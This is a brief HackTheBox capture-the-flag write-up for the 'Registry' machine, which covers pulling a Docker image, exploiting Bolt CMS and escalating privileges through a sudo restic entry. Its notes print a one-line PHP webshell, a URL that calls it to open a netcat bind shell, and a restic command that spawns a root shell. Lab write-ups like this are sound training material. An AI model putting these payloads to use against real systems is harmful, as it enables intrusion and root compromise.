HTB Registry Write-up

less than 1 minute read

Registry is a 40-point machine on HackTheBox that involves interacting with a docker registry to download a docker image and finding a password and ssh private key inside. For root we exploit a flaw in bolt cms to upload a webshell and then abuse a sudo entry that allows us to start restic backup as root. My walkthrough is available on youtube:

Notes


/etc/docker/daemon.json:

{
  "insecure-registries" : ["docker.registry.htb:80"]
}

docker:

sudo systemctl restart docker
docker login docker.registry.htb:80
docker pull docker.registry.htb:80/bolt-image:latest
docker image ls
docker image inspect <image id>

bolt webshell:

<?php echo system($_REQUEST['xcmd']);?>
http://registry.htb/bolt/files/xct.php?xcmd=nc.traditional+-lp+2000+-e /bin/bash

restic docs:

https://restic.readthedocs.io/en/latest/030_preparing_a_new_repo.html

restic exploit:

sudo /usr/bin/restic backup -r rest/ -r sftp:bolt@127.0.0.1:/var/tmp/rest -o sftp.command="nc.traditional -lp 2000 -e /bin/bash" /proc/version

Updated: